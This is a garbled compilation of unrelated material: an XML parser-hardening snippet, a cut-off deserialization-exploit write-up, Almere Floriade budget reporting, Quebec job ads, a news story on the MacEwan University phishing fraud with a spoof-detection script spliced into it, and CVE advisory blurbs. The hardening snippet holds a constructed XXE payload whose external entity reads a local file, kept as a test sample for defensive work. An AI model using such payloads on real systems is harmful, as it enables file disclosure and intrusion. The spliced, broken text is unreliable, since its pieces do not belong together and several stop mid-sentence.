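def parse_config_safely(data: bytes) -> ET.Element:
    """Parse an untrusted config document with external entities ruled out."""
    reject_dtd(data)
    return ET.fromstring(data)


def is_accepted(data: bytes) -> bool:
    """Convenience wrapper: True if the document passes both stages."""
    try:
        parse_config_safely(data)
    except (ForbiddenXML, ET.ParseError, expat.ExpatError):
        return False
    return True


# Constructed: a plain config document with no DTD.
BENIGN_XML = b'<?xml version="1.0"?><config><title>hello</title></config>'

# Constructed: a DOCTYPE that declares an external entity, the pattern behind
# XXE. The SYSTEM identifier is a placeholder, not a real path.
DTD_XML = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE config [<!ENTITY ext SYSTEM "file:///placeholder/local/file">]>'
    b'<config><title>&ext;</title></config>'
)
```

Rejecting the DOCTYPE outright is the simplest policy and the one most XML-hardening libraries default to; if a schema genuinely requires a DTD, the narrower alternative is to allow the DOCTYPE but keep the entity-declaration handler raising. Either way, a rejected document should be logged with the root element name, since config files that arrive with a DTD are unusual enough to be worth investigating.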



    Since the "ConfigFile" class seemed like a good entry point, we chose it as the class to serialize. To exploit the deserialization vulnerability, we needed to find where the serialization method was invoked. The code showed that the content being serialized is the memes array stored in the session:


    The deserialization phase occurs in the import function, when uploading a new "memepak" file. The function first validated that we had uploaded a file, then read its content, base64 decoded it, and sent it to the
              Lib-Nat government defies IPCC climate warning to back coal
    Australia’s conservative Liberal-National government has rejected the Intergovernmental Panel on Climate Change (IPCC) report’s call to phase out coal power by 2050, claiming renewable energy cannot replace base-load coal power. The National Party deputy prime minister, Michael McCormack, said Australia should “absolutely” continue to use and exploit its coal reserves, despite the IPCC’s dire warnings […]
              New Arctic Ocean fishing to be banned under new global deal
    Commercial fishing in parts of the Arctic Ocean opened up by melting ice caps will be banned under a new deal to protect ecosystems. Nine countries and the European Union will this week sign the agreement to prevent exploitation of a region covering 2.8 million square kilometres, roughly the size of the Mediterranean Sea, for 16 […]
              Almere - Floriade district costs more and has less social housing

    The Floriade residential district will not get 30% social housing, but 20%. That is stated in Amvest's final development plan. The project developer says it could build more social housing, but that would cost the municipality of Almere 4.2 million euros. The municipal executive (mayor and aldermen) considers that too much money for the construction of 60 social homes and agrees to 20%. Nor does the municipality make a million in profit on Amvest's development plan, as the council wanted, but rather a loss of 7.6 million euros.

    The city council will probably consider the Floriade file at the Political Market after the autumn break. The council can submit comments on the development plan until 1 December. After that the executive decides whether the contract is definitively awarded to Amvest. Professor of Area Development Arjan Bregman of the University of Amsterdam had earlier expressed concerns about this approach, but according to then-alderman Mark Pol that was unjustified and the council can still withdraw from the deal.

    [Quote: mayor and aldermen: "The loss of 7.6 million is an investment in the future"]

    For the development of the residential district, the city council issued a European tender on 1 December last year. Besides Amvest, Dura Vermeer and BPD also took part, but the bids of those two parties were declared invalid, leaving Amvest.

    What were the council's requirements and wishes?
    The council gave the executive a number of frameworks for selecting a market party. One requirement concerned the sale of the land for 600 homes and 60 water homes. The deal with Amvest had to net Almere one million euros. Extra noise-reduction measures also had to be taken.

    A further important wish concerned the construction of homes for people on a tight budget: 20% social rental and 10% social owner-occupied.

    The council also wanted the district to be very low-traffic, with at most a thousand parking spaces, as far as possible at the edges of the district. Parking garages are at most 150 metres from the houses and residents use electric shared cars.

    [Image:https://d103xssldlwvo3.cloudfront.net/image/vidcaster/pictures/181009_Impressies_Floriade_1_91AB9C4955F90031C125832100468FF7.jpg]

    Allowing more housing could wipe out the multi-million loss
    Amvest's plan shows that the municipality makes no profit on the sale of the land but a loss of millions. The land development of the district produces a shortfall of 7.6 million euros. The costs amount to about 61 million. The municipality invests in the area mainly through the planting of the tree and plant library, the arboretum, and the construction of traffic bridges. The proceeds from selling the land to Amvest amount to about 53,400,000 euros.

    According to the executive, the loss can largely be paid from the municipality's reserves: 7.2 million. In addition, the new Floriade business case would yield about 400,000 euros, which could be set off against the loss. The council will soon discuss this further at the Political Market when it deals with next year's budget.

    The executive sees the loss of 7.6 million more as an investment in the future. The investments in the area that go with a district with more homes will then already have been made. Another discussion the council will therefore have concerns allowing extra homes to be built in the district. The municipality has now set this at 600 homes and 60 water homes in the new zoning plan. But consultancy Andersson Elffers Felix (AEF) states in a report that at least a thousand more homes could be added, good for extra proceeds of 35 to 40 million euros. The loss of 7.6 million euros would then be more than compensated.

    Against the loss, moreover, Amvest prepares the land for construction and habitation, builds the infrastructure and develops the area at its own expense and risk. The project developer will invest about 300 million in the area, according to the documents. Amvest also wants to commit to the area for the long term.

    [Image:https://d103xssldlwvo3.cloudfront.net/image/vidcaster/pictures/181009_Impressies_Floriade_2_F341C9E1A85C4CC6C125832100468FFE.jpg]

    How much public money is already in the Floriade?
    It is not the first time extra money has been requested for the Floriade project. Last year the council already put about 4.4 million euros extra into the organisation of the Floriade. That money came on top of the 10 million euros originally set aside. Both times the responsible aldermen at the time promised that it would stop there. The current alderman Loes Ypma now also says she does not expect to have to ask the council for extra money again.

    Besides the loss on the land development, Almere is putting a total of almost 14.4 million euros into the Floriade business case. In addition, the municipality is also setting aside 3.4 million euros in the budget for quiet asphalt for the Floriade residential district. The province is paying 10 million euros. The municipality further hopes that the national government will contribute at least 5 million euros, but that amount is still not certain. Smaller contributions from other authorities, such as the municipality of Amsterdam, are also being counted on.

    Floriade district largely completed during the event
    With the arrival of Amvest, the area development and the event will be integrated even more closely. The investments in the area serve both the event grounds and the new residential district. A large part of the homes and facilities will also be built during the Floriade event: 428 homes and pavilions. These must be in place by mid-2021 for the event to be able to start on 29 April 2022. Part of the real estate will be converted into homes after the world horticultural exhibition. The district will be completed after the six-month event. That will take until about 2024.

    Fewer social rental homes and more private-sector rental homes
    The housing programme of the future district will look different, though. The council had earlier expressed the wish that of the 600 homes 30% would be social housing, 15% private-sector rental, 25% mid-priced owner-occupied and 30% expensive owner-occupied homes with 30 plots. But in Amvest's plan there are above all fewer social rental homes and more private-sector rental homes:

    - 20% social housing (120 apartments spread over four blocks)
    - 40% private-sector rental homes (180 houses and 120 apartments of 100-140 m2)
    - 10% mid-priced owner-occupied homes (60 houses of 120 m2)
    - 30% expensive owner-occupied homes, including 30 plots (55 houses and 95 apartments of 120-200 m2 and 30 plots)
    - 60 expensive water homes
    - 42,000 square metres of facilities (hotel with 180 rooms, hospitality, market hall, childcare, commercial buildings). Besides the facilities developed by Amvest, Aeres University of Applied Sciences is also building a 4,000 square metre campus on the site and the province is putting up a 1,000 square metre innovation pavilion.

    Tree and plant library possibly a botanical garden
    For the management and maintenance of the arboretum, the creation of a park management organisation in which both the municipality and Amvest participate is still under consideration. To preserve the Floriade site, it is being examined whether it can be given monument status. It would then be the first area in Almere where the greenery receives such a status. It is also still being investigated whether an official botanical garden can be set up to manage the tree and plant library. It would then be the first botanical garden in Flevoland.

    Winy Maas: "Too few buildings covered with plants"
    Municipal supervisor Winy Maas is reasonably positive about the development plan. Architect and urban planner Maas, who made the design for the Floriade, also has concerns. He is not yet convinced that there is enough green architecture in the area. "Many buildings are not or insufficiently covered with planting, and those buildings that do have green balconies or facades seem to have only a limited relationship with the arboretum," he writes in his advice. He believes a visual quality plan should be drawn up.

    [Quote: Winy Maas, architect: "Many buildings are not or insufficiently covered with planting."]

    Concerns about too few entries to fill the pavilions
    So much for the developments around the Floriade residential district. External consultancy Andersson Elffers Felix (AEF), commissioned by the municipality, has taken another close look at the organisation of the Floriade event, the so-called mid-term review. Is Floriade BV still more or less on course?

    The report indicates that there are concerns about the organisation of the event.

    - More concrete objectives are needed. The objectives formulated are currently very diverse, from a showcase for the horticultural sector to a learning process for the greening of cities. This makes it hard to steer the recruitment of entries for the event, as well as the recruitment of sponsors and subsidies.

    - The Floriade is at its core an exhibition at which countries and cities present themselves. For recruiting international entries, the BV depends on the efforts of others, such as the Dutch embassies abroad. It is questionable whether there will be certainty about these entries soon enough. AEF thinks this will happen only to a limited extent given the tight schedule.

    - The municipal organisation and Floriade BV are finding it increasingly difficult to work together. Because of the closer connection between the event and the residential district, better cooperation is precisely what is needed. The council is currently considering a new structure on the basis of advice from former minister Cees Veerman.

    - The BV has a greater need for people with experience in organising large-scale events and festivals, their programming, recruiting sponsors and lobbying for national and international entries. That will in any case be taken into account when recruiting a new director, the executive says in a response to the report. The current director Jan-Willem Griep has been sidelined for a long period by illness and the other director, Jannewietske de Vries, has found a new job. The project director of the municipal organisation, Remko Schnieders, is therefore temporarily taking over the BV's duties.

    [image:https://d103xssldlwvo3.cloudfront.net/image/vidcaster/pictures/181009_Impressies_Floriade_5_59CCE5E6C0D6862CC125832100468FEF.jpg]

    Costs for the Floriade event rise, resulting in less profit
    Now that the residential district and the event are more intertwined, a new calculation has also been made of all these expenses and revenues. This is because some costs and revenues have now been placed in the land development, so that Floriade BV's business case now looks different. In particular, the investments for the site are being transferred to the land development.

    Furthermore, the costs of organising the event have risen, because an extra 3.8 million is being put into the project organisation. That is in line with AEF's advice that a stronger organisation is needed to make the event a success. The BV itself also expects to have to invest more in the attractiveness of the Floriade programme, and a cost item for site security has now been included in the budget.

    The result is that the event is no longer expected to make 2 million in profit, but about 250,000 euros.

    Half a million extra for the risk reserve
    The municipality has further taken a closer look at the risks involved in organising the event. An extra half a million is now being reserved for this. That brings the amount to a total of 11.5 million euros. This amount had already been raised once before, from 7 to 11 million euros.

    Because Amvest is taking on the further development of the event grounds and the urban district, a number of risks relating to this lapse. On the other hand, risks have also been added. For instance, there are concerns about entries from foreign cities. The Dutch entries may also be of too low a standard.

    Amvest also wants to offer overnight stays on the site during the event. That does require a good evening programme. There is a chance that there will be too little interest in an evening programme. The costs incurred would then be a new risk.

    Moreover, not all security costs are yet clear. For instance, the evening programme could entail extra expenditure in this area.
              Title: Wireless Sales Associate - Sept Iles - OSL Retail Services Inc - Sept-Îles, QC
    Then OSL is made for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in full...
    From OSL Retail Services Inc - Mon, 24 Sep 2018 13:21:37 GMT - View all Sept-Îles, QC jobs
              Title: Wireless Sales Associate - Alma - OSL Retail Services Inc - Alma, QC
    Then OSL is made for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in full...
    From OSL Retail Services Inc - Fri, 06 Jul 2018 01:21:59 GMT - View all Alma, QC jobs
              Title: Wireless Sales Associate - Val D'Or - OSL Retail Services Inc - Val-d'Or, QC
    Then OSL is made for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in full...
    From OSL Retail Services Inc - Thu, 20 Sep 2018 01:20:16 GMT - View all Val-d'Or, QC jobs
              Title: Wireless Store Manager - OSL Retail Services Inc - Québec City, QC
    Then OSL is made for you. At OSL, we know how to reward our employees. Walmart Canada has partnered with OSL to operate its 350 wireless...
    From OSL Retail Services Inc - Mon, 17 Sep 2018 19:20:40 GMT - View all Québec City, QC jobs
              Title: Wireless Sales Associate - Levis - OSL Retail Services Inc - Lévis, QC
    Then OSL is made for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in full...
    From OSL Retail Services Inc - Thu, 04 Oct 2018 19:19:16 GMT - View all Lévis, QC jobs
              Title: Wireless Sales Associate - Victoriaville - OSL Retail Services Inc - Victoriaville, QC
    Then OSL is made for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in full...
    From OSL Retail Services Inc - Wed, 03 Oct 2018 13:20:36 GMT - View all Victoriaville, QC jobs
              Title: Wireless Sales Associate - Ste-Agathe des Monts - OSL Retail Services Inc - Sainte-Agathe-des-Monts, QC
    Then OSL is made for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in full...
    From OSL Retail Services Inc - Wed, 22 Aug 2018 19:20:44 GMT - View all Sainte-Agathe-des-Monts, QC jobs
              Title: Wireless Store Manager - Joliette - OSL Retail Services Inc - Joliette, QC
    Then OSL is made for you. At OSL, we know how to reward our employees. Walmart Canada has partnered with OSL to operate its 350 wireless...
    From OSL Retail Services Inc - Fri, 21 Sep 2018 19:20:02 GMT - View all Joliette, QC jobs
              Title: Wireless Sales Associate - Joliette - OSL Retail Services Inc - Joliette, QC
    Then OSL is made for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in full...
    From OSL Retail Services Inc - Fri, 21 Sep 2018 19:19:46 GMT - View all Joliette, QC jobs
              Title: Wireless Sales Associate - Drummondville - OSL Retail Services Inc - Drummondville, QC
    Then OSL is made for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in full...
    From OSL Retail Services Inc - Thu, 12 Jul 2018 01:18:36 GMT - View all Drummondville, QC jobs
              How a fraudster got $12 million out of a Canadian university: They just asked for it

    EDMONTON—The email started with an innocent “Hiya,” but the words that followed set off a chain of events that would tarnish a university’s reputation and send investigators on a months-long chase across the ocean and back.

    It’s been just over a year since MacEwan University was blindsided by an $11.8-million fraud. While the ruse itself was simple, the case that followed was anything but. Police had to navigate a complex money-laundering scheme that funneled some of the stolen public funds through various accounts in two continents before reinvesting it in a real-estate deal in Richmond, B.C.

    By scouring court documents from cities across the country that tracked investigations in Edmonton, Vancouver, the United Kingdom and Hong Kong, StarMetro has pieced together the most comprehensive picture of the case ever published and uncovered new details about how the money was stolen and where it went.

    It began in the summer of 2017, when MacEwan was in the midst of constructing the $180-million Allard Hall: a state-of-the-art building boasting music studios and dance halls with room for 1,800 students. Emails detailing transactions worth millions of dollars were pinging back and forth between school staff and vendors.

    As a result, one particular email, sent June 27, didn’t set off any alarms. Sent by a James Ellis of Clark Builders, a construction company working on the project, the email opened with the affable “Hiya” before asking the school’s accounts receivable department to reroute payments to a new National Bank of Canada account.

    A supporting letter attached to the email appeared to have been signed by Marc Timberman, the company’s chief financial officer.


    Udeni Jayasinghe, an accounting technician with the university, changed the banking information on file. Exactly a month later, MacEwan wired $1.9 million into the new National Bank of Canada account.

    Oddly, the payment bounced back. The university’s bank confirmed the transfer didn’t go through because the account didn’t exist. Concerned, Jayasinghe replied to the email asking for updated banking co-ordinates.

    A response four days later provided new banking information, this time to an account with TD Bank. The email was accompanied by a revised letter that once again appeared to have been signed by Timberman.

    In just over a week, the university made three payments into the TD Bank account totalling more than $11.8 million.

    It would be almost two months before the university would learn the awful truth: Clark Builders never received these payments, no James Ellis had worked for the company for at least eight years and the real Timberman had no knowledge of the letters using his name.

    The email was a fraud. Over the course of a month, MacEwan University lost the equivalent of $622 for every part-time and full-time student enrolled. That’s enough to cover a year of tuition for more than 2,600 students pursuing bachelor’s degrees, or more than one-eighth of the total amount the university took in through tuition and fees during the 2016-2017 academic year.

    MacEwan had been fooled by what Const. William Lewadniuk, with the Red Deer RCMP financial crimes unit, called a “spear phishing scheme.”

    “It’s targeted to a specific individual,” said Lewadniuk. “Generally with a spear phishing scheme you would spoof the email address and try to get them to send you money, so you would pretend to be a contractor or a person’s boss.”

    The fraud was only discovered when Serge L’Abbe, senior project manager with Clark Builders, contacted the university on Aug. 23, 2017 to inquire about the missing money.

    The university immediately started investigating, according to a sworn statement filed in court in Montreal by Stuart McLean, associate vice-president of facilities with Grant MacEwan’s board of governors.

    They quickly discovered that while the email appeared to have been sent by “accounts.recievable@clarkbuilders.com” the email address had been “spoofed.” The display name of the email was different than the actual originating account.
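    The display-name trick described above can be caught mechanically before a payments clerk ever reads the message. What follows is an added example in Python, not code from the article, the university or the police: it parses a few constructed From headers and flags a message whose display name advertises one address while the real sender is another, or whose real domain merely resembles a known vendor domain. The domains, the vendor list and the sample headers are all hypothetical.

```python
"""Screen inbound From headers for display-name spoofing.

Added example (not code from the article, the university or the police):
a defender-side check for the trick where the display name of a message
advertises one sender while the actual originating address is another.
All addresses and domains below are constructed.
"""
import re
from email.utils import parseaddr

# Constructed sample headers (hypothetical domains, not the ones in the case).
SAMPLE_FROM_HEADERS = [
    # display name is an address, but the real sender is a free-mail account
    '"accounts.receivable@vendor.example" <mailer-7731@freemail.example>',
    # ordinary, consistent header from the vendor's own domain
    '"Accounts Receivable" <accounts.receivable@vendor.example>',
    # real domain is a lookalike of the vendor's domain
    '"Vendor Payments" <payments@vendor-example.co>',
    # bare address, no display name at all
    "payments@vendor.example",
]

# Domains the organisation is known to do business with (constructed list).
KNOWN_VENDOR_DOMAINS = {"vendor.example"}

EMAIL_IN_TEXT = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot lookalike domains (a character or two off)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _normalize(domain: str) -> str:
    """Drop case and punctuation so 'vendor-example.co' compares as 'vendorexampleco'."""
    return re.sub(r"[^a-z0-9]", "", domain.lower())


def lookalike(domain: str, known: str) -> bool:
    """True when two domains differ only by punctuation or a couple of characters."""
    return levenshtein(_normalize(domain), _normalize(known)) <= 2


def check_from_header(header: str, known_domains=KNOWN_VENDOR_DOMAINS) -> dict:
    """Return a verdict for one From header.

    Two signals are checked:
      1. the display name embeds an e-mail address that is not the real one;
      2. the real domain is not a known vendor domain but resembles one.
    """
    display, addr = parseaddr(header)
    actual_domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    reasons = []

    embedded = EMAIL_IN_TEXT.search(display or "")
    if embedded and embedded.group(0).lower() != addr.lower():
        reasons.append(f"display name carries a different address: {embedded.group(0)}")

    if actual_domain and actual_domain not in known_domains:
        for known in known_domains:
            if lookalike(actual_domain, known):
                reasons.append(f"sender domain {actual_domain} resembles known vendor domain {known}")

    return {"address": addr, "display": display, "suspicious": bool(reasons), "reasons": reasons}


def triage(headers=SAMPLE_FROM_HEADERS) -> list:
    """Return the real sender addresses of every header that trips a check."""
    return [r["address"] for r in map(check_from_header, headers) if r["suspicious"]]


if __name__ == "__main__":
    for h in SAMPLE_FROM_HEADERS:
        verdict = check_from_header(h)
        print("SUSPICIOUS" if verdict["suspicious"] else "ok        ", h)
        for reason in verdict["reasons"]:
            print("    -", reason)
```

    Run against the constructed samples, the first and third headers are flagged and the two consistent ones pass. A check like this belongs at the mail gateway or in the payments mailbox rules; it does not replace the callback to a known-good phone number that the article's investigators recommend, it only decides which messages deserve that callback first.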

    The university’s first break came on Aug. 25, 2017 when a Montreal Superior Court justice issued a seizure order and took back $6.3 million from the TD account, recovering more than half of the missing funds.

    The account had been opened under the name of Mono Shoes Inc., a company registered to a fifth-floor apartment near downtown Montreal. Before MacEwan’s millions of dollars poured in, according to documents filed in court, the account had a balance of less than $70.

    But this was just the beginning of the trail, not the end. In another plot twist, the man identified by a corporate registry search as president, sole director and shareholder of Mono Shoes — Jehad Albatniji — claimed he, too, had been a victim of fraud.

    In September, while he was in Jordan, Albatniji exchanged emails with one of MacEwan’s lawyers. He alleged a man in Montreal introduced him to another man in Toronto — the “main culprit,” Albatniji said, who had access to an account in Hong Kong.

    Here the story enters its second major theatre: East Asia. From the Mono Shoes TD account, investigators were able to track a trail of transactions to accounts based in Hong Kong.

    Lewadniuk — who has worked with the RCMP’s financial crimes unit in Red Deer for three years, with expertise in money laundering involving the proceeds of crime — said the money stolen in these types of schemes typically doesn’t stick around.

    “More and more, the money doesn’t stay in Canada,” he said. “They’ll try to get it sent out to a country outside of Canada because it is harder for us to recover the funds or follow up.”

    In cases like this, Lewadniuk said, finding out exactly who is responsible and building a case strong enough to lay criminal charges is rare.

    Criminals often create shell companies with corporate accounts, sometimes using stolen identities, to shuffle money around while concealing the identity of the people controlling the accounts.

    “They want to make it as hard as possible for people to be able to trace where the money goes, so you go from account to account to account through so many countries,” said Lewadniuk.

    Just one day after MacEwan wired $1.9 million to the Mono Shoes account, $1.4 million of the stolen funds was sent from the Mono Shoes account to an account supposedly operated by a company called Kinglong Commerce Development Ltd., based in Hong Kong.

    So began a series of transactions that would see the money moved from account to account before it was reinvested in a legitimate real-estate deal back on Canadian soil.

    Around the same time the fraud was unfolding in Edmonton, Vancouver-based company Hoi Fu Enterprises Ltd., owned by mother Jin Lan Feng and son John Yuan, was in the process of acquiring land in Richmond, B.C. The property at 4008 Stolberg St. was valued at over $25 million, but Hoi Fu Enterprises did not have the funds to purchase it outright.

    According to documents filed with the Supreme Court of British Columbia, the seller offered them a short-term mortgage to finance part of the purchase. The sale was completed on July 12, 2017, with Hoi Fu Enterprises Ltd. acquiring the property through a holding company.

    To pay back the mortgage, Hoi Fu Enterprises borrowed money from Yangjiang City Jixie Zhulu Engineering Ltd. in China. The registered legal representative and shareholder of that company is Yuan’s uncle.

    However, to lend Hoi Fu Enterprises the money, Yangjiang City Jixie Zhulu Engineering had to find a way to convert the funds from Chinese currency and send the money to Hoi Fu in Canada. This is how the stolen funds got involved.

    Yangjiang City Jixie Zhulu Engineering was then “introduced” to two individuals, Shao Xiong Ma and Shao Yun Ma, who claimed they could help purchase Canadian funds and move them from China to Canada, according to a statement filed on behalf of Hoi Fu Enterprises. Yangjiang City Jixie Zhulu Engineering agreed to lend the Mas the money in the form of Chinese renminbi on the condition that they repay their loan in Canadian dollars to Hoi Fu Enterprises in Canada.

    Between June and July of 2017, Yangjiang City Jixie Zhulu Engineering made four payments to the Mas totalling ¥6.7 million, which would have been worth approximately $1.2 million. In August, Hoi Fu Enterprises received three wire transfers totalling $1 million.

    What Hoi Fu Enterprises said it didn’t know was that the Mas had made a side deal with Kinglong Commerce Development. The Mas would make payments totalling ¥5.3 million — approximately $1 million — to four individuals and one company in China.

    In exchange, the Kinglong Commerce Development account, which had previously received $1.4 million in funds stolen during the MacEwan fraud, would transfer $1 million to Hoi Fu Enterprises.

    Kibben Jackson, a Vancouver-based lawyer who represented Hoi Fu Enterprises during MacEwan’s investigation and subsequent civil suits, said the owners contend they never knew the money they would eventually use to repay their mortgage on the property deal in Richmond was stolen from MacEwan University.

    Jackson said that after MacEwan threatened to seize $1 million from Hoi Fu Enterprises, the company settled the lawsuit in March 2018. He could not disclose how much money Hoi Fu Enterprises offered to MacEwan.

    While the case may have been complex, it was certainly not unique, according to experts in the field.

    Financial crimes specialist Garry Clement, who did not work on the case, said criminal networks between Canada and Asia have been well established over decades. Clement previously worked with police for 34 years, going undercover to chase some of the highest levels of organized crime in Canada. He was also formerly the national director for the RCMP’s Proceeds of Crime Program.

    Clement said that, prior to 1997, there wasn’t a specific charge under the Criminal Code of Canada for being a member of an organized crime group, as there is under Hong Kong law. Without an equivalent on the books, immigrants with that kind of criminal history wouldn’t be automatically precluded from entering Canada.

    “As a result, we did end up with our fair share of known organized-crime figures in Canada,” said Clement.

    This allowed criminals to set up networks between the two countries that have persisted to this day.

    “You’ve created a network, and that network enables you to do a lot of things through various company formations,” said Clement. “That is essentially what you are seeing in China: Money is flowing that has been defrauded.”

    Clement said it is not uncommon for the proceeds of crime to end up in legitimate investments as criminals look to keep their money safe and out of reach of authorities. An investment of choice, said Clement, is real estate, given its relative stability and the large sums of money involved.

    “Nobody asks the genesis of the money,” Clement said.

    Through legal action in Hong Kong, the university was able to recover nearly $3.8 million from another individual — not named in court documents available in Vancouver or Montreal — who had also been transferred stolen MacEwan funds from the Mono Shoes TD Bank account.

    In all, MacEwan University announced on April 4, 2018 that it had successfully recovered $10.9 million of the $11.8 million lost to the scam.

    More than $960,000 remains missing — a stinging loss that has prompted change at the university and beyond.

    “Taxpayers rightly expect that the money we give to universities is spent on educating our students and isn’t lost because of poor financial controls that are in place,” Advanced Education Minister Marlin Schmidt told StarMetro in a recent interview. “We all have a fiduciary responsibility to make sure that the money is spent properly.”

    After finding out it had been defrauded, the university waited a week before alerting the public to the loss. A press release assured students that the university’s IT systems were secure and that it had already begun tracking the majority of the stolen funds with the help of legal counsel in Montreal, London and Hong Kong.

    MacEwan University president Deborah Saucier was not made available for comment.

    When the administration credited the “swift response and diligent efforts” of staff, legal counsel, investigators and the banks for seeing the return of 92 per cent of the lost funds, it revealed few details about where the money went or how it was recovered.

    That was by design. A presentation to the 2018 Canadian Association of University Business Officers Conference reveals university officials feared “significant political fallout” and loss of reputation in the wake of the scam. University executives, according to the document, refused to provide media with access to Saucier and employed a “disciplined” communications strategy, despite public promises of transparency.

    In a statement posted online in October 2017, Saucier said “the fraud did shine spotlights on two glaring gaps in our organization.”

    An internal audit revealed there were inadequate controls in place for changing payment information. There was no requirement for a manager or supervisor to review changes to payment information on file. It also found employees didn’t bother to contact the vendor in any way to confirm the request was valid.

    The press release sent out in April outlined some of the measures administration took to ensure they wouldn’t be fooled again.

    Employees are now required to verify all changes to vendor files by phone and a follow-up email, and all financial changes must first be reviewed by a supervisor, manager or director. A supplied audit report system was also implemented, tracking every change made to vendor files. The university has made employee training in social engineering attacks, phishing and other online scams mandatory.

    Minister Schmidt praised MacEwan for making changes to its financial department, “including some staff changes at the highest levels, which was a good first step.”

    Brent Quinton, who was the university’s vice-president of finance and administration at the time of the fraud, resigned from his position three weeks after the fraud was discovered, walking away with a $540,000 severance payout.

    No staff members were fired, though some were placed in different positions. Harry Oosteroff, executive director of the MacEwan Staff Association, said “our members were treated appropriately.”

    The provincial government is taking steps to prevent such costly, embarrassing mistakes in the future. The Ministry of Advanced Education’s senior financial officer is now leading a team tasked with “identifying ways that we can help build capacity at institutions to improve their financial controls” so public dollars allocated for the benefit of post-secondary students don’t end up in the wrong hands.

    “There are always improvements that can be made, and our department is working with institutions to continually improve the financial systems that are used to protect the taxpayers’ dollars,” Schmidt said.

    After all, this isn’t the first time a post-secondary institution in Alberta has been fooled. An investigation into a similar fraud at the University of Lethbridge found that while the university had such controls in place, staff weren’t following them.

    The University of Lethbridge sent $368,000 to scammers over a two-month period in 2016, “when payments owing to an external vendor of the university were sent through a process of misdirection to an alternative, nonauthentic bank account,” said Mike Mahon, president and vice-chancellor, in a statement in December 2016.

    Const. Lewadniuk said low-tech solutions, such as having two people sign off on financial transactions or following up on emails with a phone call to the person or company in question, can be key in avoiding high-tech fraud.

    There are institutional changes on the horizon as well. Clement, the financial crimes specialist, is eager to see stronger regulations around identifying beneficial ownership of property, corporations and bank accounts. Beneficial ownership is an arrangement in which the person who enjoys the benefits of the property or bank accounts, such as profits, isn’t necessarily the person listed on the title.

    Clement said that, until recently, numbered companies would have one or two directors listed, “but there was not that requirement to drill down to see who is actually the beneficial owners of that money.”

    Finance ministers across Canada entered an agreement to strengthen such regulations and bring them into force by July 1, 2019. The regulations seek to curb the misuse of corporations and other legal entities being exploited for tax evasion, money laundering, corruption and financing terrorism.

    But until those regulations are brought into force and investigators are given the resources they need to chase down these types of crime, Clement fears such financial crime will continue “unabated.”

    “If you stem the flow of money and stem their ability to make that profit, you can curb a lot of activity,” said Clement. “But as long as there’s that profit to be made, people are going to gamble.”

    Claire Theobald is an Edmonton-based reporter who covers crime and the courts. Follow her on Twitter: @clairetheobald

    With files from Michael Mui, Vancouver-based investigative reporter. Follow him on Twitter: @mui24hours


              Heavy Vehicle Mechanic (Candidate Pool) - ArcelorMittal Exploitation minière Canada s.e.n.c. - Fermont, QC
    Please note that this position requires relocating to the town of Fermont. Rebuild, overhaul, repair and adjust all equipment fitted with a... $39.76 an hour
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 26 Sep 2018 20:46:11 GMT - View all Fermont, QC jobs
              Mining Equipment Operator (Candidate Pool) - ArcelorMittal Exploitation minière Canada s.e.n.c. - Fermont, QC
    Please note that this position requires relocating to the town of Fermont. Under the supervision of the mining operations foreman, incumbents... $35.78 an hour
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 26 Sep 2018 20:45:54 GMT - View all Fermont, QC jobs
              Maintenance Mechanic (Candidate Pool) - ArcelorMittal Exploitation minière Canada s.e.n.c. - Fermont, QC
    Please note that this position requires relocating to the town of Fermont. Reporting to the foreman of the department concerned, the mechanics carry out the... $39.76 an hour
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 26 Sep 2018 20:45:48 GMT - View all Fermont, QC jobs
              Blaster - ArcelorMittal Exploitation minière Canada s.e.n.c. - Fermont, QC
    Please note that this position requires relocating to the town of Fermont. Prepare drill holes for blasting, such as:.... $38.44 an hour
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Wed, 26 Sep 2018 20:45:39 GMT - View all Fermont, QC jobs
              Microsoft Filter Manager Elevation Of Privilege (CVE-2018-8333)
    An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
              Microsoft Windows Shell Remote Code Execution (CVE-2018-8495)
    A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
              Microsoft NTFS Elevation of Privilege (CVE-2018-8411)
    An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
              Microsoft DirectX Information Disclosure (CVE-2018-8486)
    An information disclosure vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability would allow a remote attacker to obtain sensitive information.
              Microsoft Edge Chakra Scripting Engine Memory Corruption (CVE-2018-8505)
    A memory corruption vulnerability exists in Microsoft Edge. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
              Apache Portals Pluto Remote Code Execution (CVE-2018-1306)
    A vulnerability exists in Apache Portals Pluto. The vulnerability is due to improper handling of HTTP methods. A remote attacker can exploit this vulnerability by submitting a crafted request to the target server.
              Microsoft Win32k Elevation of Privilege (CVE-2018-8453)
    An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
              Microsoft Internet Explorer Memory Corruption (CVE-2018-8491)
    A memory corruption vulnerability exists in Microsoft Internet Explorer. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
